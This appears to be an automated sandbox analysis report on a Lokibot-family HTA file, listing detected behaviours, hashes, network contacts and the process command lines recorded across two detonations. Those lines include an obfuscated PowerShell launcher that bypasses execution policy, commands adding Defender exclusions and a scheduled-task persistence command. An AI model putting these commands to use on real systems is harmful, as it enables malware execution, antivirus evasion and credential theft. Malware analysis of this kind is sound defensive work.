Analysis Overview
SHA256
11f9aa994a349d0b21caacb75e8b7198f1f52828628efd891aa7116b261e2182
Threat Level: Known bad
The file givemebestwithentiretimegivenmebestthingsalwaysforgetbacknew.hta was found to be: Known bad.
Malicious Activity Summary
Lokibot
Lokibot family
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Evasion via Device Credential Deployment
Downloads MZ/PE file
Checks computer location settings
Reads user/profile data of web browsers
Executes dropped EXE
Loads dropped DLL
Accesses Microsoft Outlook profiles
Suspicious use of SetThreadContext
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Suspicious use of WriteProcessMemory
Scheduled Task/Job: Scheduled Task
Suspicious use of AdjustPrivilegeToken
Modifies Internet Explorer settings
outlook_win_path
Suspicious behavior: EnumeratesProcesses
outlook_office_path
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-18 17:36
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-18 17:36
Reported
2024-11-18 17:38
Platform
win7-20241010-en
Max time kernel
134s
Max time network
144s
Command Line
Signatures
Lokibot
Lokibot family
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WInDowspoWeRSheLl\V1.0\pOwersheLl.eXe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Evasion via Device Credential Deployment
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WInDowspoWeRSheLl\V1.0\pOwersheLl.eXe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WInDowspoWeRSheLl\V1.0\pOwersheLl.eXe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WInDowspoWeRSheLl\V1.0\pOwersheLl.eXe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WInDowspoWeRSheLl\V1.0\pOwersheLl.eXe | N/A |
Reads user/profile data of web browsers
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2364 set thread context of 2184 | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | C:\Users\Admin\AppData\Roaming\caspol.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WInDowspoWeRSheLl\V1.0\pOwersheLl.eXe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WInDowspoWeRSheLl\V1.0\pOwersheLl.eXe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WInDowspoWeRSheLl\V1.0\pOwersheLl.eXe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\givemebestwithentiretimegivenmebestthingsalwaysforgetbacknew.hta"
C:\Windows\SysWOW64\WInDowspoWeRSheLl\V1.0\pOwersheLl.eXe
"C:\Windows\sYStem32\WInDowspoWeRSheLl\V1.0\pOwersheLl.eXe" "PowErShEll -EX bYPaSS -nOp -w 1 -c DEvicEcREdENTIAlDEplOyMenT ; INvoKe-eXPrEssIOn($(InvoKe-eXPRessIon('[sYsteM.tExT.eNcODing]'+[ChaR]0x3A+[cHAr]58+'utF8.GetstrIng([SYStEM.CoNVErT]'+[cHAr]58+[CHaR]58+'FROmbASE64STRinG('+[ChAR]34+'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'+[CHAr]0x22+'))')))"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYPaSS -nOp -w 1 -c DEvicEcREdENTIAlDEplOyMenT
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gcy1gdzu.cmdline"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7B68.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC7B67.tmp"
C:\Users\Admin\AppData\Roaming\caspol.exe
"C:\Users\Admin\AppData\Roaming\caspol.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\caspol.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\pYSJOdJUV.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pYSJOdJUV" /XML "C:\Users\Admin\AppData\Local\Temp\tmp2FB8.tmp"
C:\Users\Admin\AppData\Roaming\caspol.exe
"C:\Users\Admin\AppData\Roaming\caspol.exe"
C:\Users\Admin\AppData\Roaming\caspol.exe
"C:\Users\Admin\AppData\Roaming\caspol.exe"
Network
| Country | Destination | Domain | Proto |
| US | 192.3.243.136:80 | 192.3.243.136 | tcp |
| DE | 94.156.177.95:80 | | tcp |
| DE | 94.156.177.95:80 | | tcp |
| DE | 94.156.177.95:80 | | tcp |
| DE | 94.156.177.95:80 | | tcp |
| DE | 94.156.177.95:80 | | tcp |
Files
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | baafe88179dc4258625508d251e9433b |
| SHA1 | a18d3fcca419ef0189bc27c5c11f2d8650414c6f |
| SHA256 | fd31e9a08ad49185902a5b4d363753e84a30f594b0b737ae35344ff3ad8e3f3d |
| SHA512 | cac5cea7d219ffbd2d3cb5ab4a6e24d0ce86762c2672bffcf8431b5ef6e0a4aa37886e1dcb340aedee20f2450264977b787668b60117b5104917a1a6be4e263a |
\??\c:\Users\Admin\AppData\Local\Temp\gcy1gdzu.cmdline
| MD5 | e46d949b3b806672dff146631e084b22 |
| SHA1 | ce4dbfcf962c55079a02fe2175d5f79dc2f6241d |
| SHA256 | bd13fd164b3c8e4242112fa1e450c5dcd0ff8dd4533c356d0b99233fa8b3fa82 |
| SHA512 | 771aa6e00336cb991eea0213391fb7a574812ab537dabb0c26e465423ade39af7240c3572658e5e90a03dd77fbbf419af5d7146dfea4e4d388b243fc48b8616f |
\??\c:\Users\Admin\AppData\Local\Temp\gcy1gdzu.0.cs
| MD5 | f8419bbc398e1a2b134eec88b333f8f6 |
| SHA1 | 57ebba4cad00272da80b919df0908ec40f9be48a |
| SHA256 | 25fccfa20b9b6d921f804167f1637df00cdd3203af9c0313f99de7c6e9989db3 |
| SHA512 | b1f4044b7a62e1de69d8e4a8ebf4db6bb24fd40d486ec5e44bd3e6b835e62ef5078c79236ded9c21ce1b0acd3575acaf1908f4fcc6ee12f1fd5f7455c4b14674 |
\??\c:\Users\Admin\AppData\Local\Temp\CSC7B67.tmp
| MD5 | 76ebb156653c2f2789cb1a49d039662e |
| SHA1 | 2a2025c0e92660609bfe05727954bb7ed801b9b4 |
| SHA256 | e7b27d0922fd596ad5adc8b018bcbd7bdd3898be1760736626c1b7275b5ded01 |
| SHA512 | bc2d7ec16be6b074a8f369ce81c54f5ee4ba417f3f320a6debab3c1fc86202718c3a79fe083d36b684770bf349a8de042aa492a43b9421f9191f5b414c077c69 |
C:\Users\Admin\AppData\Local\Temp\gcy1gdzu.dll
| MD5 | 64a5e8597d9c10d936f454bee6b73ada |
| SHA1 | 7a20d3b6eb7ebae39b4d18ef3d19953903c9b970 |
| SHA256 | 7c912db647b5a92d82d832246b35b6d79c9cce29a3e849f61b6b9b694afbd5ec |
| SHA512 | 1c8e07acf2658dff805e49dc3979d97be1a2e2ba291af1ed681a6f1a61ec98dc27035ec27bc195c4c51c69e68b72544ce7cbae67abe504d359af4cdb175695c8 |
C:\Users\Admin\AppData\Local\Temp\RES7B68.tmp
| MD5 | 60938ba734d356cdbd0088a2a125ceb9 |
| SHA1 | ed0f625527cf7e380748ed5f0bc4cf3d8457782d |
| SHA256 | 9988b58e97bb2246945c02de05fa4c74c087a679720b60e2bec77bfe9e6f02f6 |
| SHA512 | 1ce350ad62ef4350a106f56de4151ebaebb49327930c94a03f0995d81dcfd0b63bf6d8b7cc95a85e0e6903f43003f192fe02fbcac631c60a0ef7bc3181e799d3 |
C:\Users\Admin\AppData\Local\Temp\gcy1gdzu.pdb
| MD5 | 50c5616b4162a22d4a4eec06178f67e3 |
| SHA1 | cdada22ff816ea188e11247da184d9140d336c26 |
| SHA256 | 669ca6e2cfa316c5a9938884cf919a2757918928f40be9912e7626c4b35153cc |
| SHA512 | 73f15ed96a6aea579d22fde0d975aa1466f282b0ee3f7a9d603650dacda40aaf1cf8efdad5f0cc17c163f2ba7fed2a7595ab534e6c5fd88e5224e2910309ba31 |
C:\Users\Admin\AppData\Roaming\caspol.exe
| MD5 | 318ff90d7a2797a041b836f7f8900f62 |
| SHA1 | fdda6afed7a1643ae353e7a635e6744c2b0a07d5 |
| SHA256 | 241d0df35796a2c2ae0ae4af70ef9e6571c23536fef35c1c0c172d703203a430 |
| SHA512 | 808942ba5db2e4d3d1d29a52c065acad4fcaae328dc43a3b977234f1b58d2838abf73d03b0992cd0f5ac4939e29f354c6c2ea25a4822a461b8ef74cec0eb3aac |
memory/2364-35-0x0000000000290000-0x0000000000324000-memory.dmp
memory/2364-36-0x00000000003D0000-0x00000000003E2000-memory.dmp
memory/2364-37-0x0000000005290000-0x00000000052F4000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 0c4b894cedbe547fb993389e509e9669 |
| SHA1 | be2b9f698731cf7b75848d46e8101d8a9c40c724 |
| SHA256 | 1e2d142b7709e15454691457c51df3fad9f885ad7dd8dca80c78501ba8d49fea |
| SHA512 | 0cd0ac75661c7f7de5d2ba2d30b922aba8086547a4db9fc956682a8f553d3a770fe956cb63087831b55a696553963957ffb2f2b8a6a1089adf9900d8608a8cd6 |
C:\Users\Admin\AppData\Local\Temp\tmp2FB8.tmp
| MD5 | 06936a3c1db83f5c87bca803fc45306b |
| SHA1 | 5bf371b8f1c9204bbf48f3a31d664bafd16b9fbd |
| SHA256 | 68a60050215e39d48e3032d5826bb5282009308721c71a9556a8056377ecae8e |
| SHA512 | 9281d5c736c1f34debd8713e71ec2435cd8edaff281c6bbf9afdec29e359804487e247ba9ae3acd9442e4ecc51a6537900b390fc753dd521bac0f785fc46ffd9 |
memory/2184-54-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/2184-58-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/2184-56-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/2184-67-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/2184-65-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/2184-64-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2184-62-0x0000000000400000-0x00000000004A2000-memory.dmp
memory/2184-60-0x0000000000400000-0x00000000004A2000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2039016743-699959520-214465309-1000\0f5007522459c86e95ffcc62f32308f1_d58f30ce-7498-4544-8c46-d67b11e386bc
| MD5 | d898504a722bff1524134c6ab6a5eaa5 |
| SHA1 | e0fdc90c2ca2a0219c99d2758e68c18875a3e11e |
| SHA256 | 878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9 |
| SHA512 | 26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61 |
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2039016743-699959520-214465309-1000\0f5007522459c86e95ffcc62f32308f1_d58f30ce-7498-4544-8c46-d67b11e386bc
| MD5 | c07225d4e7d01d31042965f048728a0a |
| SHA1 | 69d70b340fd9f44c89adb9a2278df84faa9906b7 |
| SHA256 | 8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a |
| SHA512 | 23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-18 17:36
Reported
2024-11-18 17:38
Platform
win10v2004-20241007-en
Max time kernel
138s
Max time network
147s
Command Line
Signatures
Lokibot
Lokibot family
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WInDowspoWeRSheLl\V1.0\pOwersheLl.eXe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Evasion via Device Credential Deployment
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WInDowspoWeRSheLl\V1.0\pOwersheLl.eXe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
Reads user/profile data of web browsers
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3440 set thread context of 2760 | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | C:\Users\Admin\AppData\Roaming\caspol.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WInDowspoWeRSheLl\V1.0\pOwersheLl.eXe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WInDowspoWeRSheLl\V1.0\pOwersheLl.eXe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WInDowspoWeRSheLl\V1.0\pOwersheLl.eXe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WInDowspoWeRSheLl\V1.0\pOwersheLl.eXe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook | C:\Users\Admin\AppData\Roaming\caspol.exe | N/A |
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\givemebestwithentiretimegivenmebestthingsalwaysforgetbacknew.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\SysWOW64\WInDowspoWeRSheLl\V1.0\pOwersheLl.eXe
"C:\Windows\sYStem32\WInDowspoWeRSheLl\V1.0\pOwersheLl.eXe" "PowErShEll -EX bYPaSS -nOp -w 1 -c DEvicEcREdENTIAlDEplOyMenT ; INvoKe-eXPrEssIOn($(InvoKe-eXPRessIon('[sYsteM.tExT.eNcODing]'+[ChaR]0x3A+[cHAr]58+'utF8.GetstrIng([SYStEM.CoNVErT]'+[cHAr]58+[CHaR]58+'FROmbASE64STRinG('+[ChAR]34+'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'+[CHAr]0x22+'))')))"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYPaSS -nOp -w 1 -c DEvicEcREdENTIAlDEplOyMenT
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\vpqxczhe\vpqxczhe.cmdline"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD38C.tmp" "c:\Users\Admin\AppData\Local\Temp\vpqxczhe\CSC633947E119804030A21172F9908F922A.TMP"
C:\Users\Admin\AppData\Roaming\caspol.exe
"C:\Users\Admin\AppData\Roaming\caspol.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\caspol.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\pYSJOdJUV.exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pYSJOdJUV" /XML "C:\Users\Admin\AppData\Local\Temp\tmp8112.tmp"
C:\Users\Admin\AppData\Roaming\caspol.exe
"C:\Users\Admin\AppData\Roaming\caspol.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 182.129.81.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.159.190.20.in-addr.arpa | udp |
| US | 192.3.243.136:80 | 192.3.243.136 | tcp |
| US | 8.8.8.8:53 | 136.243.3.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.31.95.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| DE | 94.156.177.95:80 | | tcp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| DE | 94.156.177.95:80 | | tcp |
| US | 8.8.8.8:53 | 22.49.80.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| DE | 94.156.177.95:80 | | tcp |
| DE | 94.156.177.95:80 | | tcp |
| DE | 94.156.177.95:80 | | tcp |
Files
memory/1748-0-0x0000000070BAE000-0x0000000070BAF000-memory.dmp
memory/1748-1-0x0000000005160000-0x0000000005196000-memory.dmp
memory/1748-2-0x0000000070BA0000-0x0000000071350000-memory.dmp
memory/1748-3-0x00000000057D0000-0x0000000005DF8000-memory.dmp
memory/1748-4-0x0000000005770000-0x0000000005792000-memory.dmp
memory/1748-5-0x0000000006070000-0x00000000060D6000-memory.dmp
memory/1748-6-0x00000000060E0000-0x0000000006146000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_04mdrev0.wjp.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1748-16-0x0000000006150000-0x00000000064A4000-memory.dmp
memory/1748-17-0x0000000006710000-0x000000000672E000-memory.dmp
memory/1748-18-0x0000000006750000-0x000000000679C000-memory.dmp
memory/4404-28-0x0000000007210000-0x0000000007242000-memory.dmp
memory/4404-29-0x000000006D460000-0x000000006D4AC000-memory.dmp
memory/4404-39-0x00000000071D0000-0x00000000071EE000-memory.dmp
memory/4404-40-0x0000000007450000-0x00000000074F3000-memory.dmp
memory/4404-41-0x0000000007BD0000-0x000000000824A000-memory.dmp
memory/4404-42-0x0000000007590000-0x00000000075AA000-memory.dmp
memory/4404-43-0x00000000075F0000-0x00000000075FA000-memory.dmp
memory/4404-44-0x0000000007820000-0x00000000078B6000-memory.dmp
memory/4404-45-0x0000000007790000-0x00000000077A1000-memory.dmp
memory/4404-46-0x00000000077C0000-0x00000000077CE000-memory.dmp
memory/4404-47-0x00000000077D0000-0x00000000077E4000-memory.dmp
memory/4404-48-0x00000000078E0000-0x00000000078FA000-memory.dmp
memory/4404-49-0x0000000007810000-0x0000000007818000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\vpqxczhe\vpqxczhe.cmdline
| MD5 | b116759c3a46e55d009454c05ad48777 |
| SHA1 | d0dacaa7be3b4f6624273b67eb07972846a40bbb |
